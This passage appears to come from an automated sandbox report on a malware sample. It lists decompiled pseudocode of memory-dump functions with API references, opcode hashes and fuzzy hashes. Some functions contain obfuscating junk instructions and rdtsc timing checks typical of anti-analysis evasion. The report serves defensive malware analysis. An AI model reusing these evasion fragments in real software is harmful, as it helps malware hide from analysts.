							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088ab
0x004088b3
0x004088b5
0x004088ba
0x004088bf
0x004088d2
0x004088d7
0x004088e0
0x004088ec
0x004088ff
0x00408904
0x00408907
0x00408910
0x00408922
0x00408927
0x0040892c
0x00000000
0x00000000
0x0040892e
0x00408932
0x00000000
0x00000000
0x00408934
0x00000000
0x00408932
0x00408936
0x00408939
0x0040893f
0x00408941
0x0040894c
0x00408951
0x00408954
0x00408961
0x0040896c
0x0040896e
0x00408974
0x00408978
0x0040897b
0x0040897b
0x00408982
0x00408985
0x0040898a
0x00408997
0x004088c6
0x004088c6
0x004088c6

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: e734902a588a01c6e2b051ebf769807b15cf7e0c0c64d341f33143468a58d1a4
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00418611(void* __eax, void* __ecx, void* __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t14;

				asm("stc");
				asm("fsubr qword [ebx+0x3c5eefcc]");
				_pop(ss);
				asm("rcl dword [ebp-0x75], 0xec");
				_push(_t26);
				_t11 = _v0;
				_push(_t23);
				E00418DB0(__eax, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t14;
			}

0x00418611
0x00418612
0x00418618
0x0041861f
0x00418620
0x00418623
0x0041862c
0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: db086c56b27296c1f0a28171a7b9bde2b298c401faa25c7e78ddda5fec40a287
Instruction ID: ea07846829a1bfc8f00a511cb3024d4cc2159273dfbab5e04a0ce1509f5ec091
Opcode Fuzzy Hash: db086c56b27296c1f0a28171a7b9bde2b298c401faa25c7e78ddda5fec40a287
Instruction Fuzzy Hash: 07F0A071200208BFDB20CF68DC44EDB77ACEF85260F148159F90DAB282CB30A840CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 004184B5, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004184B5(signed int __eax, void* __ecx, void* __edx, void* __esi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t13;
				void* _t21;
				void* _t23;

				asm("xlatb");
				_t23 = __esi - 1;
				_push(__edx);
				 *(__edx + 0x55cb9b4f) =  *(__edx + 0x55cb9b4f) ^ __eax;
				_t10 = _v0;
				_push(_t23);
				_t5 = _t10 + 0xc74; // 0xc74
				E00418DB0(_t21, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t13;
			}

0x004184b5
0x004184b6
0x004184b7
0x004184bb
0x004184c3
0x004184c9
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8cf319a51c80da7091a27c8b290bd5183e1782b5f17b0553e0863113a5050af7
Instruction ID: 44c9ac87a0932b96ac879a70fd235e2ffd17aaa503edc0d0263e07bfee3f20b6
Opcode Fuzzy Hash: 8cf319a51c80da7091a27c8b290bd5183e1782b5f17b0553e0863113a5050af7
Instruction Fuzzy Hash: D2E039B1200604ABC728DF69CC45EA777A8EF88360F108259BA189B291C631E810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418497
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418503
0x0041851a
0x00418528

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A126F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 69ef6f8e521fbd413af224bfcde7d2e94c0f79955a1d1cdbcfe40f06376ae6dc
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 49F0C2317245599BEB48EB189D65BFB33E5EB94300F58C039ED49C7281E631DD90C391

Uniqueness

Uniqueness Score: -1.00%

Function 00A010D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00A00060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 00A001D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 00A0010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A01148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 009FF8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00A01930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009FF938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 009FFA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

